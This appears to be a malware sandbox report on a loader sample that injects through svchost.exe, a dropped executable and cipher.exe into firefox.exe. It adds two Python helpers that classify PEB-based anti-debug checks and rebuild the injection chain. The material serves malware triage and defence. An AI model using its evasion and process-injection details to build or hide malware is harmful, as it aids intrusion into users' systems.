            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03004940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F2A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F2A364 SetUnhandledExceptionFilter
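Every `mov eax, dword ptr fs:[00000030h]` line above is a read of the PEB pointer out of the TEB (fs:[0x30] in a 32-bit process). The read itself is neutral: the same instruction opens the classic `PEB.BeingDebugged` (offset 0x02) and `NtGlobalFlag` (offset 0x68) debugger checks, and also the `PEB.Ldr` (offset 0x0C) module walk that position-independent code uses to resolve APIs without an import table. What distinguishes the two is the displacement at which the loaded pointer is dereferenced next. The following is an added example, not code from the Joe Sandbox report or from the sample: it scans raw 32-bit code for the four load encodings the report lists (eax, ecx, edx and esi destinations) and classifies each by the next instruction. The `SAMPLE` byte string is constructed for the demonstration; the opcode encodings and PEB offsets are the documented x86 ones.

```python
# Added example: classify 32-bit PEB reads (mov r32, fs:[30h]) by the PEB
# field the loaded pointer is dereferenced at.  SAMPLE is constructed.

# "mov <reg>, dword ptr fs:[30h]".  eax has the short moffs form (64 A1 disp32);
# the other registers use 64 8B /r with a disp32-only ModRM (mod=00, r/m=101).
PEB_LOADS = {
    b"\x64\xa1\x30\x00\x00\x00": "eax",
    b"\x64\x8b\x0d\x30\x00\x00\x00": "ecx",
    b"\x64\x8b\x15\x30\x00\x00\x00": "edx",
    b"\x64\x8b\x35\x30\x00\x00\x00": "esi",
}
REG_INDEX = {"eax": 0, "ecx": 1, "edx": 2, "esi": 6}   # ModRM r/m numbers

# 32-bit PEB fields that anti-debug and import-resolution code reach through
# the pointer just loaded.
PEB_FIELDS = {
    0x02: "BeingDebugged (anti-debug)",
    0x0C: "Ldr (module list walk / API resolution)",
    0x68: "NtGlobalFlag (anti-debug, heap-flag check)",
}


def _deref_disp8(code: bytes, pos: int, reg: str):
    """Displacement of the instruction at `pos` if it is a [reg+disp8] access
    (mov r32,[..] / movzx r32,byte [..] / cmp byte [..],imm8), else None."""
    rm = REG_INDEX[reg]

    def modrm_ok(b: int) -> bool:               # mod=01 (disp8), r/m = our register
        return (b >> 6) == 1 and (b & 7) == rm

    if len(code) < pos + 3:
        return None
    op = code[pos]
    if op == 0x8B and modrm_ok(code[pos + 1]):                      # mov r32, [reg+disp8]
        return code[pos + 2]
    if (op == 0x0F and code[pos + 1] == 0xB6 and len(code) >= pos + 4
            and modrm_ok(code[pos + 2])):                            # movzx r32, byte [reg+disp8]
        return code[pos + 3]
    if op == 0x80 and modrm_ok(code[pos + 1]) and ((code[pos + 1] >> 3) & 7) == 7:
        return code[pos + 2]                                         # cmp byte [reg+disp8], imm8
    return None


def scan_peb_accesses(code: bytes) -> list:
    """Return sorted (offset, register, purpose) for every fs:[30h] load in `code`."""
    hits = []
    for pattern, reg in PEB_LOADS.items():
        start = 0
        while (i := code.find(pattern, start)) != -1:
            disp = _deref_disp8(code, i + len(pattern), reg)
            if disp is None:
                purpose = "pointer kept, use not decoded"
            else:
                purpose = PEB_FIELDS.get(disp, f"PEB+0x{disp:02x}")
            hits.append((i, reg, purpose))
            start = i + 1
    return sorted(hits)


# Constructed 32-bit stub (not from the analysed sample): a BeingDebugged
# check, an Ldr walk and an NtGlobalFlag check, each starting with fs:[30h].
SAMPLE = (
    b"\x55\x8b\xec"                                        # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00" b"\x0f\xb6\x40\x02"       # mov eax, fs:[30h]; movzx eax, byte [eax+2]
    b"\x85\xc0\x75\x10"                                    # test eax, eax; jnz short +0x10
    b"\x64\x8b\x0d\x30\x00\x00\x00" b"\x8b\x49\x0c"       # mov ecx, fs:[30h]; mov ecx, [ecx+0Ch]
    b"\x64\xa1\x30\x00\x00\x00" b"\x8b\x40\x68"           # mov eax, fs:[30h]; mov eax, [eax+68h]
    b"\x83\xe0\x70"                                        # and eax, 70h  (the three FLG_HEAP_* debug bits)
    b"\xc9\xc3"                                            # leave; ret
)

if __name__ == "__main__":
    for off, reg, purpose in scan_peb_accesses(SAMPLE):
        print(f"+0x{off:04x}  mov {reg}, fs:[30h]  -> {purpose}")
```

Run against a dumped code section (for instance the unpacked `2.2.svchost.exe.470000.0.unpack` image) the scanner turns a list of bare addresses into a count of debugger checks versus loader walks; a function whose follow-up is `PEB+0x0C` is an import resolver, not an evasion, and should be triaged as such.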

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtOpenKeyEx: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtQueryValueKey: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\cipher.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cipher.exe  Section loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: read write
            Source: C:\Windows\SysWOW64\cipher.exe  Section loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cipher.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\cipher.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cipher.exe  Thread register set: target process: 6408
            Source: C:\Windows\SysWOW64\cipher.exe  Thread APC queued: target process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 3DE008
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F58C93 LogonUserW
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F64EF5 mouse_event
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe  Process created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe"
            Source: C:\Windows\SysWOW64\cipher.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
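The `Section loaded`, `Memory written`, `Thread APC queued` and `Process created` lines above are one hand-off chain rather than isolated events: the submitted sample maps an RWX section into a SysWOW64 `svchost.exe` it spawned with its own command line, that svchost maps into the dropped executable under Program Files (x86) and into `cipher.exe`, and `cipher.exe` finally maps into `firefox.exe` while also writing back into the dropped executable (RW plus RWX sections and a queued APC). As an added example, not code from the report, the Python below parses those event lines into a process graph and walks it from the submitted sample. The event strings are the report's own lines re-typed with a space between the source path and the event name; `Thread register set` only names a PID here, so it is parsed but cannot be linked to an image.

```python
import ntpath
import re
from collections import defaultdict

# Added example: rebuild the injection / hand-off chain from Joe Sandbox
# behaviour lines.  REPORT_LINES are the report's lines, re-typed.
SAMPLE = r"C:\Users\user\Desktop\PI No 20000814C.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
DROPPED = (r"C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf"
           r"\YoOsbbockoYKKBpRowW.exe")
CIPHER = r"C:\Windows\SysWOW64\cipher.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

REPORT_LINES = [
    f"Source: {SAMPLE}  Section loaded: NULL target: {SVCHOST} protection: execute and read and write",
    f"Source: {SVCHOST}  Section loaded: NULL target: {DROPPED} protection: execute and read and write",
    f"Source: {SVCHOST}  Section loaded: NULL target: {CIPHER} protection: execute and read and write",
    f"Source: {CIPHER}  Section loaded: NULL target: {DROPPED} protection: read write",
    f"Source: {CIPHER}  Section loaded: NULL target: {FIREFOX} protection: execute and read and write",
    f"Source: {CIPHER}  Thread register set: target process: 6408",
    f"Source: {CIPHER}  Thread APC queued: target process: {DROPPED}",
    f"Source: {SAMPLE}  Memory written: {SVCHOST} base: 3DE008",
    f'Source: {SAMPLE}  Process created: {SVCHOST} "{SAMPLE}"',
    f'Source: {DROPPED}  Process created: {CIPHER} "{CIPHER}"',
    f'Source: {CIPHER}  Process created: {FIREFOX} "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"',
]

EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*"
    r"(?P<kind>Section loaded|Memory written|Thread APC queued|Thread register set|Process created):\s*"
    r"(?P<rest>.*)$"
)
# How to pull the target image out of each event's remainder.  "Thread
# register set" only carries a PID in this report, so it has no entry.
TARGET_RE = {
    "Section loaded":    re.compile(r"NULL target:\s*(.+?)\s+protection:"),
    "Memory written":    re.compile(r"(.+?)\s+base:"),
    "Thread APC queued": re.compile(r"target process:\s*(.+\.exe)$"),
    "Process created":   re.compile(r'(.+?\.exe)\s+"'),
}


def build_graph(lines):
    """Return (edges, kinds): source image -> {target images}, and
    (source, target) -> {event kinds observed between them}."""
    edges = defaultdict(set)
    kinds = defaultdict(set)
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        rx = TARGET_RE.get(m["kind"])
        t = rx.match(m["rest"]) if rx else None
        if not t:
            continue
        src, dst = ntpath.basename(m["src"]), ntpath.basename(t.group(1))
        edges[src].add(dst)
        kinds[(src, dst)].add(m["kind"])
    return edges, kinds


def injection_chains(lines, root):
    """All simple paths from `root`.  Cycles are cut, because cipher.exe and
    the dropped executable inject into each other."""
    edges, _ = build_graph(lines)
    chains = []

    def walk(node, path):
        nxt = sorted(t for t in edges.get(node, ()) if t not in path)
        if not nxt:
            chains.append(path)
        for t in nxt:
            walk(t, path + [t])

    start = ntpath.basename(root)
    walk(start, [start])
    return chains


def longest_chain(lines, root):
    return max(injection_chains(lines, root), key=len)


if __name__ == "__main__":
    for chain in injection_chains(REPORT_LINES, SAMPLE):
        print(" -> ".join(chain))
    _, kinds = build_graph(REPORT_LINES)
    for (s, d), k in sorted(kinds.items()):
        print(f"{s} -> {d}: {', '.join(sorted(k))}")
```

The longest path is the one to act on: sample, svchost.exe, the dropped executable, cipher.exe, firefox.exe. The per-edge event kinds also tell you which hop is the hollowing (section map plus memory write plus process creation with the parent's command line) and which is the later browser hook (section map into firefox.exe with no process creation of its own).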
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F64C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: IProgram Manager
            Source: PI No 20000814C.exe, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
            Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
            Source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4524431579.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000000.2145129232.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524923976.0000000001480000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F2886B cpuid
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F42230 GetUserNameW
            Source: C:\Users\user\Desktop\PI No 20000814C.exe  Code function: 0_2_00F3418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
